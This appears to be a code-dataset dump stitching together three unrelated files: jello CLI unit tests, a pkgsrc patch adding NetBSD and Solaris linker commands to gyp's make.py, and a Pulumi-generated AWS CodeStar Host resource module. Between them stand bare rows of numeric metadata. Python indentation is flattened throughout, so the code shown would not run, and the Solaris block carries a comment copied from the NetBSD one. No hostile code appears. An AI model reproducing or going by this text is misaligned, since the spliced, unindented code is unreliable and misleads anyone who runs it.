f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_.parsers']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18(self):
"""
Test jc -a | jello '_["parsers"][18]'
"""
self.expected = '''\
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"][18]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_dot(self):
"""
Test jc -a | jello _.parsers[18]
"""
self.expected = '''\
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_.parsers[18]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s_parsers_18_dot(self):
"""
Test jc -a | jello -s _.parsers[18]
"""
self.expected = '''\
.name = "id";
.argument = "--id";
.version = "1.0";
.description = "id command parser";
.author = "Kelly Brazil";
.author_email = "kellyjonbrazil@gmail.com";
.compatible[0] = "linux";
.compatible[1] = "darwin";
.compatible[2] = "aix";
.compatible[3] = "freebsd";
.magic_commands[0] = "id";
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', '_.parsers[18]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_name(self):
"""
Test jc -a | jello '_["parsers"][18]["name"]'
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"][18]["name"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_name_dot(self):
"""
Test jc -a | jello _.parsers[18].name
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_.parsers[18].name']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_name(self):
"""
Test jc -a | jello -l '_["parsers"][18]["name"]'
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_["parsers"][18]["name"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_name_dot(self):
"""
Test jc -a | jello -l _.parsers[18].name
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_.parsers[18].name']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_r_parsers_18_name(self):
"""
Test jc -a | jello -r '_["parsers"][18]["name"]'
"""
self.expected = 'id\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-r', '_["parsers"][18]["name"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_r_parsers_18_name_dot(self):
"""
Test jc -a | jello -r _.parsers[18].name
"""
self.expected = 'id\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-r', '_.parsers[18].name']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_compatible(self):
"""
Test jc -a | jello '_["parsers"][18]["compatible"]'
"""
self.expected = '''\
[
"linux",
"darwin",
"aix",
"freebsd"
]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_compatible_dot(self):
"""
Test jc -a | jello _.parsers[18].compatible
"""
self.expected = '''\
[
"linux",
"darwin",
"aix",
"freebsd"
]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -s _.parsers[18].compatible
"""
self.expected = '''\
.[0] = "linux";
.[1] = "darwin";
.[2] = "aix";
.[3] = "freebsd";
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers_18_compatible(self):
"""
Test jc -a | jello -c '_["parsers"][18]["compatible"]'
"""
self.expected = '["linux","darwin","aix","freebsd"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -c _.parsers[18].compatible
"""
self.expected = '["linux","darwin","aix","freebsd"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_compatible(self):
"""
Test jc -a | jello -l '_["parsers"][18]["compatible"]'
"""
self.expected = '''\
"linux"
"darwin"
"aix"
"freebsd"
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -l _.parsers[18].compatible
"""
self.expected = '''\
"linux"
"darwin"
"aix"
"freebsd"
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_lr_parsers_18_compatible(self):
"""
Test jc -a | jello -lr '_["parsers"][18]["compatible"]'
"""
self.expected = '''\
linux
darwin
aix
freebsd
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-lr', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_lr_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -lr _.parsers[18].compatible
"""
self.expected = '''\
linux
darwin
aix
freebsd
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-lr', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_list_comprehension(self):
"""
Test jc -a | jello -c '[entry["name"] for entry in _["parsers"] if "darwin" in entry["compatible"]]'
"""
self.expected = '["airport","airport_s","arp","crontab","crontab_u","csv","df","dig","du","env","file","group","history","hosts","id","ifconfig","ini","jobs","last","ls","mount","passwd","pip_list","pip_show","ps","shadow","uname","uptime","w","who","xml","yaml"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '[entry["name"] for entry in _["parsers"] if "darwin" in entry["compatible"]]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_list_comprehension_dot(self):
"""
Test jc -a | jello -c '[entry.name for entry in _.parsers if "darwin" in entry.compatible]'
"""
self.expected = '["airport","airport_s","arp","crontab","crontab_u","csv","df","dig","du","env","file","group","history","hosts","id","ifconfig","ini","jobs","last","ls","mount","passwd","pip_list","pip_show","ps","shadow","uname","uptime","w","who","xml","yaml"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '[entry.name for entry in _.parsers if "darwin" in entry.compatible]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_jlines_to_json(self):
"""
Test cat twitterdata.jlines | jello
"""
self.expected = self.twitterdata_output
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_lines_table(self):
"""
Test cat twitterdata.jlines | jello -l '\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result'
"""
self.query = '''\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result
'''
self.expected = self.twitter_table_output
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', self.query]
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_lines_table_schema(self):
"""
Test cat twitterdata.jlines | jello -s '\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result'
"""
self.query = '''\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result
'''
self.expected = self.twitter_table_output_schema
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', self.query]
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_lines_table_dot(self):
"""
Test cat twitterdata.jlines | jello -l '\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet.user.id)
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet.user.id == user:
user_profile.update({
"user_id": user,
"user_name": tweet.user.screen_name,
"user_followers": tweet.user.followers_count})
tweet_ids.append(str(tweet.id))
user_profile.tweet_ids = ";".join(tweet_ids)
result.append(user_profile)
result'
"""
self.query = '''\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet.user.id)
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet.user.id == user:
user_profile.update({
"user_id": user,
"user_name": tweet.user.screen_name,
"user_followers": tweet.user.followers_count})
tweet_ids.append(str(tweet.id))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result
'''
self.expected = self.twitter_table_output
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', self.query]
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
if __name__ == '__main__':
unittest.main()
| 45.819457
| 12,740
| 0.60716
| 17,181
| 153,541
| 5.346429
| 0.015133
| 0.039714
| 0.084392
| 0.148927
| 0.835734
| 0.80007
| 0.744745
| 0.739595
| 0.732563
| 0.731615
| 0
| 0.026574
| 0.158121
| 153,541
| 3,350
| 12,741
| 45.833134
| 0.684047
| 0.029972
| 0
| 0.537237
| 0
| 0.036919
| 0.914397
| 0.400342
| 0
| 0
| 0
| 0
| 0.010185
| 1
| 0.010503
| false
| 0.006047
| 0.002546
| 0
| 0.013367
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
336f1b7a21506cfec58038472545773c94776183
| 6,053
|
py
|
Python
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1
|
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-pylib_gyp_generator_make.py,v 1.4 2014/08/25 13:20:12 fhajny Exp $
Force platform libtool na Darwin, see
https://code.google.com/p/gyp/issues/detail?id=354&q=libtool
Also, don't try to use thin archives on NetBSD, they appear not to work
("ar t <archive>" says "Malformed archive").
--- pylib/gyp/generator/make.py.orig 2014-07-14 14:19:49.000000000 +0000
+++ pylib/gyp/generator/make.py
@@ -167,9 +167,83 @@ quiet_cmd_solink_module = SOLINK_MODULE(
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
"""
+LINK_COMMANDS_NETBSD = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
+LINK_COMMANDS_SOLARIS = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
LINK_COMMANDS_MAC = """\
quiet_cmd_alink = LIBTOOL-STATIC $@
-cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
+cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool /usr/bin/libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
@@ -350,7 +424,7 @@ sed -e "s|^$(notdir $@)|$@|" $(depfile).
# We remove slashes and replace spaces with new lines;
# remove blank lines;
# delete the first line and append a colon to the remaining lines.
-sed -e 's|\\||' -e 'y| |\n|' $(depfile).raw |\
+env NL=`printf "\n"` sed -e 's|\\||' -e 's| |${NL}|g' $(depfile).raw |\
grep -v '^$$' |\
sed -e 1d -e 's|$$|:|' \
>> $(depfile)
@@ -2044,6 +2118,7 @@ def GenerateOutput(target_list, target_d
header_params.update({
'flock': './gyp-flock-tool flock',
'flock_index': 2,
+ 'link_commands': LINK_COMMANDS_SOLARIS,
})
elif flavor == 'freebsd':
# Note: OpenBSD has sysutils/flock. lockf seems to be FreeBSD specific.
@@ -2056,6 +2131,11 @@ def GenerateOutput(target_list, target_d
'flock': './gyp-flock-tool flock',
'flock_index': 2,
})
+ elif flavor == 'netbsd':
+ header_params.update({
+ 'link_commands': LINK_COMMANDS_NETBSD,
+ })
+
header_params.update({
'CC.target': GetEnvironFallback(('CC_target', 'CC'), '$(CC)'),
| 48.424
| 181
| 0.660995
| 870
| 6,053
| 4.475862
| 0.266667
| 0.026708
| 0.034926
| 0.049307
| 0.80226
| 0.78454
| 0.75886
| 0.74037
| 0.723421
| 0.705958
| 0
| 0.017812
| 0.155956
| 6,053
| 124
| 182
| 48.814516
| 0.744373
| 0
| 0
| 0.265487
| 0
| 0.106195
| 0.075105
| 0.005777
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.00885
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3370e9a195f091b360cc6cd67353cf91267beeff
| 18,003
|
py
|
Python
|
sdk/python/pulumi_aws/codestarconnections/host.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | 260
|
2018-06-18T14:57:00.000Z
|
2022-03-29T11:41:03.000Z
|
sdk/python/pulumi_aws/codestarconnections/host.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,154
|
2018-06-19T20:38:20.000Z
|
2022-03-31T19:48:16.000Z
|
sdk/python/pulumi_aws/codestarconnections/host.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | 115
|
2018-06-28T03:20:27.000Z
|
2022-03-29T11:41:06.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['HostArgs', 'Host']
@pulumi.input_type
class HostArgs:
def __init__(__self__, *,
provider_endpoint: pulumi.Input[str],
provider_type: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
vpc_configuration: Optional[pulumi.Input['HostVpcConfigurationArgs']] = None):
"""
The set of arguments for constructing a Host resource.
:param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
:param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
:param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
:param pulumi.Input['HostVpcConfigurationArgs'] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
pulumi.set(__self__, "provider_endpoint", provider_endpoint)
pulumi.set(__self__, "provider_type", provider_type)
if name is not None:
pulumi.set(__self__, "name", name)
if vpc_configuration is not None:
pulumi.set(__self__, "vpc_configuration", vpc_configuration)
@property
@pulumi.getter(name="providerEndpoint")
def provider_endpoint(self) -> pulumi.Input[str]:
"""
The endpoint of the infrastructure to be represented by the host after it is created.
"""
return pulumi.get(self, "provider_endpoint")
@provider_endpoint.setter
def provider_endpoint(self, value: pulumi.Input[str]):
pulumi.set(self, "provider_endpoint", value)
@property
@pulumi.getter(name="providerType")
def provider_type(self) -> pulumi.Input[str]:
"""
The name of the external provider where your third-party code repository is configured.
"""
return pulumi.get(self, "provider_type")
@provider_type.setter
def provider_type(self, value: pulumi.Input[str]):
pulumi.set(self, "provider_type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the host to be created. The name must be unique in the calling AWS account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="vpcConfiguration")
def vpc_configuration(self) -> Optional[pulumi.Input['HostVpcConfigurationArgs']]:
"""
The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
return pulumi.get(self, "vpc_configuration")
@vpc_configuration.setter
def vpc_configuration(self, value: Optional[pulumi.Input['HostVpcConfigurationArgs']]):
pulumi.set(self, "vpc_configuration", value)
@pulumi.input_type
class _HostState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_endpoint: Optional[pulumi.Input[str]] = None,
provider_type: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
vpc_configuration: Optional[pulumi.Input['HostVpcConfigurationArgs']] = None):
"""
Input properties used for looking up and filtering Host resources.
:param pulumi.Input[str] arn: The CodeStar Host ARN.
:param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
:param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
:param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
:param pulumi.Input[str] status: The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
:param pulumi.Input['HostVpcConfigurationArgs'] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if name is not None:
pulumi.set(__self__, "name", name)
if provider_endpoint is not None:
pulumi.set(__self__, "provider_endpoint", provider_endpoint)
if provider_type is not None:
pulumi.set(__self__, "provider_type", provider_type)
if status is not None:
pulumi.set(__self__, "status", status)
if vpc_configuration is not None:
pulumi.set(__self__, "vpc_configuration", vpc_configuration)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The CodeStar Host ARN.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the host to be created. The name must be unique in the calling AWS account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="providerEndpoint")
def provider_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The endpoint of the infrastructure to be represented by the host after it is created.
"""
return pulumi.get(self, "provider_endpoint")
@provider_endpoint.setter
def provider_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "provider_endpoint", value)
@property
@pulumi.getter(name="providerType")
def provider_type(self) -> Optional[pulumi.Input[str]]:
"""
The name of the external provider where your third-party code repository is configured.
"""
return pulumi.get(self, "provider_type")
@provider_type.setter
def provider_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "provider_type", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter(name="vpcConfiguration")
def vpc_configuration(self) -> Optional[pulumi.Input['HostVpcConfigurationArgs']]:
"""
The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
return pulumi.get(self, "vpc_configuration")
@vpc_configuration.setter
def vpc_configuration(self, value: Optional[pulumi.Input['HostVpcConfigurationArgs']]):
pulumi.set(self, "vpc_configuration", value)
class Host(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
provider_endpoint: Optional[pulumi.Input[str]] = None,
provider_type: Optional[pulumi.Input[str]] = None,
vpc_configuration: Optional[pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']]] = None,
__props__=None):
"""
Provides a CodeStar Host.
> **NOTE:** The `codestarconnections.Host` resource is created in the state `PENDING`. Authentication with the host provider must be completed in the AWS Console. For more information visit [Set up a pending host](https://docs.aws.amazon.com/dtconsole/latest/userguide/connections-host-setup.html).
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.codestarconnections.Host("example",
provider_endpoint="https://example.com",
provider_type="GitHubEnterpriseServer")
```
## Import
CodeStar Host can be imported using the ARN, e.g.
```sh
$ pulumi import aws:codestarconnections/host:Host example-host arn:aws:codestar-connections:us-west-1:0123456789:host/79d4d357-a2ee-41e4-b350-2fe39ae59448
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
